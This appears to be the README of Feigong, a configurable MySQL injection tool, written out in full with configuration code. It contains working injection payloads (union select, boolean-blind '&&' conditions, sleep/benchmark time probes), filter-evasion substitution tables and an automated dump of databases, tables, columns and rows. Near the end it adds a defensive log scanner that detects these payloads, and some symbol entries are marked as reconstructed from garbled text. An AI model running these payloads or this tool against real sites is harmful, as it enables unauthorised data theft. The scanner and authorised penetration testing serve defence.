Post can take a GET request directly into the destination URL


Feigong (非攻)

Named after the weapon "Feigong" in "The Moon in the Qin Dynasty": a weapon that changes freely to suit different situations.

Feigong, a MySQL injection script that changes freely to suit every situation.


What is Feigong?

When using sqlmap, one often runs into very common filter bypasses, such as space --> %0b or %0a, for which sqlmap offers no way to obtain the data. I spent a long time improving the script so that Feigong's behaviour can be adjusted through the settings in config.py, turning it into a flexible injection script for different situations ...

Feigong currently integrates three MySQL injection methods: normal (with returned data), boolean blind (the "build" mode) and time blind ...

Before using Feigong

1. First you need to find an injection point (a tool for that may be written later)

2. Confirm that the database is MySQL

3. Confirm that data can be obtained by bypassing the filtering cleverly

4. Start using Feigong

TODO

Basic functions:
- optimize log storage
- optimize the boolean blind and time blind injection algorithms
- optimize the unpack function to avoid custom unpacking
- add a thread pool to speed up injection

Extended functions:
- add more injection statements
- add more filter bypasses
- add more databases

Update log

2016-8-5 feigong 0.9.9: completed; added the payload processing module

2016-8-9 feigong 1.0.0: completed; added log output to file, optimized part of the error handling, added more complete documentation

2016-8-24 feigong 1.0.1: completed; optimized the blind injection algorithm and the overall structure

2016-8-25 feigong 1.1.0: completed the time blind algorithm; optimized the overall structure (from 100 -> 7)

2016-8-26 feigong 1.1.1: avoided the custom unpacking function

2016-8-27 feigong 1.2.0: completed the refactoring of config into config and advanced_config; optimized the overall structure and significantly reduced redundant code

Usage documentation

Directory structure:

    Feigong
    │  .gitignore
    │  feigong.py
    │  readme.md
    ├─demo
    │  ├─demo1
    │  │    advanced_config.py
    │  │    config.py
    │  └─demo2
    │       advanced_config.py
    │       config.py
    ├─lib
    │    conpayload.py
    │    data.py
    │    dealpayload.py
    │    log.py
    │    unpack.py
    │    __init__.py
    ├─log
    └─sqlier
       │  advanced_config.py
       │  config.py
       │  __init__.py
       ├─configuration
       │    buildconfig.py
       │    __init__.py
       ├─default
       │    advanced_config_default.py
       │    config_default.py
       │    __init__.py
       ├─tamper
       │    expand.py
       │    __init__.py
       └─techniques
            columns.py
            content.py
            database.py
            tables.py
            test.py
            __init__.py

The core of Feigong is sqlier/config.py and sqlier/advanced_config.py; with code-level customization it can handle any situation.

Installation

You can get the source by clicking Download, or by cloning with git:

    git clone https://github.com/LoRexxar/Feigong.git

First you need to install the dependencies:

    pip install -r requirements.txt

Open the Feigong directory and run the default demo to see the results:

    python feigong.py

Feigong is driven by editing sqlier/config.py and sqlier/advanced_config.py. config.py is the basic configuration of Feigong and advanced_config.py is the advanced configuration; the default configuration files are kept in default/ so that a correct configuration can still be found after the defaults have been modified.

config.py is the basic configuration; injection can be performed as soon as the basic configuration is complete.

    class BaseConfig:
        def __init__(self):
            """Base class initialization: the core configuration of the entire injection tool"""
            # destination URL
            self.url = 'http://demo.lorexxar.pw/get.php'

            # request header parameters
            # cookies = {"username": data, "path": "/admin/", "Domain": "451bf8ea3268360ee.jie.sangebaimao.com"}
            # self.headers = {"Cookie": "username=" + data + "; CAPTCHA=OD8LGG6F7I71Q16J9RD7P7J9A2; Username=" + data}
            self.headers = {}

            # request method: 0 for GET, 1 for POST
            sqlirequest = ("get", "post")
            self.sqlirequest = sqlirequest[0]

            # injection mode: 0 for normal, 1 for boolean blind, 2 for time blind
            sqlimethod = ("normal", "build", "time")
            self.sqlimethod = sqlimethod[1]

            """
            From here on we enter the payload configuration. First configure the injection
            statement; it is then passed through the custom substitution table, and the
            resulting injection statement replaces the payload in the request:
            payload ===> custom substitution table ===> request ===> start injection

            For normal injection, you must construct a payload that returns 'feigong', and
            adjust the unpacking function in test mode until the return value can be obtained
            (spaces must be used as delimiters, and the payload must end with a single word;
            the ending can be changed through the custom substitution table)
            eg: self.payload = "padding' union all select 1,'feigong' #"

            For boolean blind injection, the condition is constructed with && or ||; with &&
            the padding must be a condition that returns a true value
            eg: self.payload = "padding' && 2333 #"

            For time blind injection, either of the above can be used, as long as the format
            matches and the key position is filled with 2333 or 'feigong'
            eg: self.payload = "padding' union all select 1,'feigong' #"
            eg: self.payload = "padding' && 2333 #"
            """
            self.payload = "padding' && 2333 #"

            """
            Configure the request: mark the location of the payload in the request with
            feigong (if misspelled, nothing will work ...)
            self.requesetformat = "user=feigong&passwd=ddog123&submit=log+in"
            self.requesetformat = {"user": "feigong", "password": "a"}
            """
            self.requesetformat = "user=feigong&passwd=ddog123&submit=log+in"
            # self.requesetformat = {"user": "feigong", "password": "a"}

            """
            Before injecting, you first need to test. test.py contains all the test functions:
            test, get_now_database, get_version and get_user.
            self.wtest: whether to enter test mode. Test mode has the highest priority and is
            not compatible with normal mode; it is turned on by default.
            testmethod chooses which tests to run; they are mutually compatible and can all run.
            """
            self.wtest = False
            self.testmethod = {"test": 0, "database": 1, "version": 1, "user": 1}

            """
            Choice of the formal injection mode. When test mode is on, it does not matter whether
            the formal injection mode is on. All are on by default, for a full injection that
            works automatically from the database down to the data, fetching the first 10 rows.
            content: inject data (you can preset columns, tables and database)
            columns: inject column names (you can preset tables and database)
            tables: inject table names (you can preset database)
            database: inject database names
            Uniform rule: whatever is not preset is obtained by automatically calling the class
            of the previous layer
            """
            self.wsqli = True
            self.sqlilocation = {"content": 1, "columns": 1, "tables": 1, "database": 1}

advanced_config.py is the advanced configuration, where some special conditions can be configured.

    import logging
    import requests
    from lib.conpayload import Conpayload  # module path taken from the directory tree above
    from sqlier.config import BaseConfig   # assumed import path: config.py lives in sqlier/


    class AdvanceConfig(BaseConfig):
        def __init__(self):
            """Advanced configuration; if you are not familiar with the code, it is recommended not to modify this section"""
            BaseConfig.__init__(self)

            # version number
            self.version = "v1.2.0"

            # initialize the request session
            self.s = requests.Session()

            # log level: DEBUG displays most information, INFO displays the injection results
            loglevel = (logging.DEBUG, logging.INFO, logging.WARN)
            self.loglevel = loglevel[0]

            """
            If the injection method is boolean blind, a true condition is recognized by the
            returned page length (required for blind injection). The default is 0; it can be
            set, and if it is not set, the length returned for self.payload is used.
            """
            self.len = 0

            """
            If the injection mode is time, you need to set the delay. Choose it according to
            your network environment; if the network is poor, 2-5 is recommended. The current
            version is single-threaded, so time blind injection will be slower ...
            """
            self.time = 3

            """
            The database can be customized; the default is empty, and if empty get_database()
            is called. This is a list and must follow the list format
            self.databases_name = ['test', 'test2']
            (of course, if databases_name is wrong ... no data will be injected)
            """
            # self.databases_name = ['hctfsqli1', 'test']
            self.databases_name = []

            """
            Then the table names. tables_name is a dictionary of tuples
            self.tables_name = {'hctfsqli1': ('test1', 'test2'), 'test': ('test1', 'test2')}
            (if some values are written incorrectly, the data will not be obtained)
            """
            # self.tables_name = {'test': ('test',), 'hctfsqli1': ('hhhhctf', 'test', 'users')}
            self.tables_name = {}

            """
            Then self.columns_name. columns_name is a dictionary of dictionaries of tuples
            self.columns_name = {'test': {'test': ('test', 'test1', 'test2')}, 'test2': {'test': ('test', 'test1', 'test2')}}
            (again, if a value is wrong, the data will not be injected)
            """
            # self.columns_name = {'test': {'test': ('test',)}, 'hctfsqli1': {'test': ('test1', 'testtest', 'flag1'), 'users': ('id', 'username'), 'hhhhctf': ('flag',)}}
            self.columns_name = {}

            """When injecting content, specify the upper limit on the number of rows fetched; the default is 10"""
            self.content_count = 10

            """
            Configure the custom substitution table; a reasonable table configuration can
            substitute the payload for every desired situation
            """
            self.filter = {
                # padding is the fill field; for boolean blind injection with && the padding must be true
                'padding': 'user1',
                # symbol substitution (URL encoding is applied by default for GET, no need to modify)
                # the symbol entries are reconstructed from a garbled source; check them against the project's advanced_config.py
                ' ': ' ',
                "'": "'",
                '"': '"',
                '&': '&',
                '|': '|',
                '>': '>',
                '<': '<',
                '=': '=',
                ',': ',',
                '.': '.',
                # SQL keywords
                'select': 'select',
                'insert': 'insert',
                'update': 'update',
                'delete': 'delete',
                'limit': 'limit',
                'where': 'where',
                # injection functions
                'user': 'user',
                'database': 'database',
                'version': 'version',
                'if': 'if',
                'ifnull': 'ifnull',
                'concat': 'concat',
                'ascii': 'ascii',          # hex(), bin()
                'count': 'count',
                'substring': 'substring',  # mid(), substr()
                'length': 'length',
                "sleep(" + repr(self.time) + ")": "sleep(" + repr(self.time) + ")",  # benchmark()
                # library name and table name keywords
                'information_schema': 'information_schema',
                'schemata': 'schemata',
                'schema_name': 'schema_name',
                'tables': 'tables',
                'table_name': 'table_name',
                'columns': 'columns',
                'column_name': 'column_name',
                # then special characters
                # because URL encoding is applied automatically after filtering, the substitution
                # table cannot use URL-encoded characters, eg: %0a -> \n, %0b -> \x0b
                '#': '#',  # --+
            }

            """Initialize the Dealpayload class, passing in self.sqlimethod, self.payload, self.requesetformat and self.filter"""
            self.dealpayload = Conpayload(self.sqlirequest, self.payload, self.requesetformat, self.filter, self.time)

The current version of Feigong supports only three ways of injecting MySQL:

Normal injection (normal): the injection point returns data.

Boolean blind (build): nothing is returned, but the result of execution can be determined through true/false conditions.

Time blind (time): nothing is returned, but true/false can be determined from the response time of the request.

Basic configuration

First you need the basic configuration: the target URL, the request headers, the request method, the injection mode, etc. ...

    import requests

    # destination URL
    self.url = 'http://demo.lorexxar.pw/get.php'
    self.s = requests.Session()

    # request header parameters
    # cookies = {"username": data, "path": "/admin/", "Domain": "451bf8ea2881064151ee.jie.sangebaimao.com"}
    # self.headers = {"Cookie": "username=" + data + "; CAPTCHA=OD8LGG6F7I71Q16J9RD7P7J9A2; Username=" + data}
    self.headers = {}

    # request method: 0 for GET, 1 for POST
    sqlirequest = ("get", "post")
    self.sqlirequest = sqlirequest[0]

    # injection mode: 0 for normal, 1 for boolean blind, 2 for time blind
    sqlimethod = ("normal", "build", "time")
    self.sqlimethod = sqlimethod[0]

Each of the lines above sets the corresponding parameter. The target URL does not need the query parameters appended; configuring the parameters is covered below ...

PS: if both GET and POST parameters are required and the injection point is in the POST data, you can put the GET query string directly into the target URL; the reverse case is not supported for now.

Configuration of the injection mode

Depending on the selection made in this section, different configuration options follow.

    sqlimethod = ("normal", "build", "time")
    self.sqlimethod = sqlimethod[0]

Normal

If the injection mode is normal, you need to define the base payload:

    self.payload = "padding' union all select 1,'feigong' #"

The base payload required for normal injection must return feigong.

Build

If the injection mode is build (boolean blind), you need to configure the base payload and set the page length returned for a true condition.

For boolean blind injection the condition is constructed with && or ||; with &&, the padding must be a value that makes the condition true, eg: self.payload = "padding' && 2333 #"

The page length for a true condition can be customized or left undefined, because the test function in test.py sets self.len automatically (using the base payload).

    self.len = 0

Time

If the injection mode is time, then in addition to setting the base payload you also need to set the sleep interval, which lives in the advanced configuration; the default is 2.

    self.time = 2

If the network environment is poor, 2-5 is recommended.

For time injection either of the above payloads can be used, as long as the format matches and the key position is filled with 2333 or 'feigong'.

    eg: self.payload = "padding' union all select 1,'feigong' #"
    eg: self.payload = "padding' && 2333 #"

Configuring the request format

Configure the request so that the location of the payload in the request is marked with feigong (if the spelling is wrong, nothing will work ...).

    self.requesetformat = "user=feigong&passwd=ddog123&submit=log+in"
    self.requesetformat = {"user": "feigong", "password": "a"}

The two lines above are the request formats for GET and POST requests, respectively.

Selecting the injection mode

Before injecting, you first need to test. test.py contains all the test functions: test, get_now_database, get_version and get_user.

self.wtest controls whether test mode is entered; test mode has the highest priority and is not compatible with normal mode. It is turned on by default.

testmethod chooses which tests to run; they are mutually compatible and can run at the same time.

    self.wtest = True
    self.testmethod = {"test": 0, "database": 1, "version": 1, "user": 1}

After the tests succeed, the formal injection mode can be started ...

Choice of the formal injection mode: when test mode is turned on, it does not matter whether the formal injection mode is turned on. All are turned on by default.

content injects data (you can preset columns, tables and database; 10 rows are fetched by default); columns injects column names (you can preset tables and database); tables injects table names (you can preset database); database injects database names. The uniform rule: whatever is not preset is obtained by automatically calling the class of the previous layer.

    self.wsqli = True
    self.sqlilocation = {"content": 1, "columns": 1, "tables": 1, "database": 1}

Advanced configuration

In the advanced configuration, the injection range can be narrowed through presets.

The database can be customized; the default is empty, and if empty get_database() is called. This is a list and must follow the list format (of course, if databases_name is wrong ... no data will be injected).

    # self.databases_name = ['hctfsqli1', 'test']
    self.databases_name = []

Then the table names. tables_name is a dictionary of tuples (if some values are written incorrectly, the data will not be obtained).

    # self.tables_name = {'test': ('test',), 'hctfsqli1': ('hhhhctf', 'test', 'users')}
    self.tables_name = {}

Then self.columns_name. columns_name is a dictionary of dictionaries of tuples (again, if a value is wrong, the data will not be injected).

    # self.columns_name = {'test': {'test': ('test',)}, 'hctfsqli1': {'test': ('test1', 'testtest', 'flag1'), 'users': ('id', 'username'), 'hhhhctf': ('flag',)}}
    self.columns_name = {}

When injecting content, you need to specify the upper limit on the number of rows fetched; the default is 10.

    self.content_count = 10

Configuring a custom substitution table

This part is in the advanced configuration.

Configure a custom substitution table; a reasonable table configuration can substitute the payload for every situation.

With a reasonable substitution table you can customize any payload, for example:

    '#'        --> 'group by a#'
    'sleep(2)' --> 'benchmark(10000000,sha(1))'

In short, if you are familiar with the code, you can generate any payload.

    self.filter = {
        # padding is the fill field; for boolean blind injection with && the padding must be true
        'padding': 'user',
        # symbol substitution (URL encoding is applied by default for GET, no need to modify)
        # the symbol entries are reconstructed from a garbled source; check them against the project's advanced_config.py
        ' ': ' ',
        "'": "'",
        '"': '"',
        '&': '&',
        '|': '|',
        '>': '>',
        '<': '<',
        '=': '=',
        ',': ',',
        '.': '.',
        # SQL keywords
        'select': 'select',
        'insert': 'insert',
        'update': 'update',
        'delete': 'delete',
        'limit': 'limit',
        'where': 'where',
        # injection functions
        'user': 'user',
        'database': 'database',
        'version': 'version',
        'if': 'if',
        'ifnull': 'ifnull',
        'concat': 'concat',
        'ascii': 'ascii',          # hex(), bin()
        'count': 'count',
        'substring': 'substring',  # mid(), substr()
        'length': 'length',
        "sleep(" + repr(self.time) + ")": "sleep(" + repr(self.time) + ")",  # benchmark()
        # library name and table name keywords
        'information_schema': 'information_schema',
        'schemata': 'schemata',
        'schema_name': 'schema_name',
        'tables': 'tables',
        'table_name': 'table_name',
        'columns': 'columns',
        'column_name': 'column_name',
        # then special characters
        # because URL encoding is applied automatically after filtering, the substitution
        # table cannot use URL-encoded characters, eg: %0a -> \n, %0b -> \x0b
        '#': '#',  # --+
    }
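The substitution table above and the space --> %0b / %0a filter bypass that motivated the tool are also what a defender should look for on the receiving end. The following is an added example, not code from Feigong or its author: a small Python access-log scanner that URL-decodes each query string and flags whitespace substitutes placed directly before an SQL keyword, clusters of the keywords from the table, and the sleep()/benchmark() time primitives. The log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Whitespace substitutes that a filter stripping only ' ' tends to miss (the page's
# "space --> %0b, %0a" case), plus inline comments that play the same role.
WS_SUBSTITUTE = re.compile(r"(?:\x09|\x0a|\x0b|\x0c|\x0d|/\*.*?\*/)")
# A substitute immediately followed by an SQL keyword: the space-filter evasion itself.
WS_BEFORE_KEYWORD = re.compile(
    r"(?:\x09|\x0a|\x0b|\x0c|\x0d|\*/)(?:union|select|all|from|where|and|or)\b",
    re.IGNORECASE)
# Keywords and functions from the substitution table that injection payloads rely on.
SQL_TOKEN = re.compile(
    r"\b(?:union|select|information_schema|schemata|schema_name|table_name|"
    r"column_name|concat|substring|ascii|length|ifnull)\b", re.IGNORECASE)
# Time-based primitives from the table: sleep(n) and benchmark(n, expr).
TIME_PRIMITIVE = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.IGNORECASE)


def classify_query(raw_query):
    """Return sorted findings for one URL-encoded query string (empty list = nothing seen)."""
    decoded = unquote(raw_query)
    # Fold every substitute to one real space so the keyword regexes line up either way.
    normalised = WS_SUBSTITUTE.sub(" ", decoded)
    findings = set()
    if WS_BEFORE_KEYWORD.search(decoded):
        findings.add("ws-bypass")
    if len(SQL_TOKEN.findall(normalised)) >= 2:
        findings.add("sqli-tokens")
    if TIME_PRIMITIVE.search(normalised):
        findings.add("time-based")
    return sorted(findings)


def scan_access_log(lines):
    """Return [(request_path, findings)] for every access-log line that triggers a finding."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        path = m.group(1)
        query = path.split("?", 1)[1] if "?" in path else ""
        findings = classify_query(query)
        if findings:
            hits.append((path, findings))
    return hits


# Constructed sample lines (not from any real server). The first mimics a union payload
# whose spaces were replaced by %0b, the second a time-blind probe, the third is benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Aug/2016:10:00:01 +0800] "GET /get.php?id=user1%27%0bunion%0ball%0bselect%0b1,%27feigong%27%23 HTTP/1.1" 200 512',
    '10.0.0.5 - - [27/Aug/2016:10:00:07 +0800] "GET /get.php?id=user1%27%20%26%26%20sleep(3)%23 HTTP/1.1" 200 488',
    '10.0.0.9 - - [27/Aug/2016:10:00:09 +0800] "GET /get.php?id=42 HTTP/1.1" 200 511',
]

if __name__ == "__main__":
    for path, findings in scan_access_log(SAMPLE_LOG):
        print(path, "->", ", ".join(findings))
```

A WAF or application filter that only removes literal spaces will pass the first sample through unchanged, which is exactly why the scanner decodes first and normalises the substitutes before matching.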

Start injection

    python feigong.py
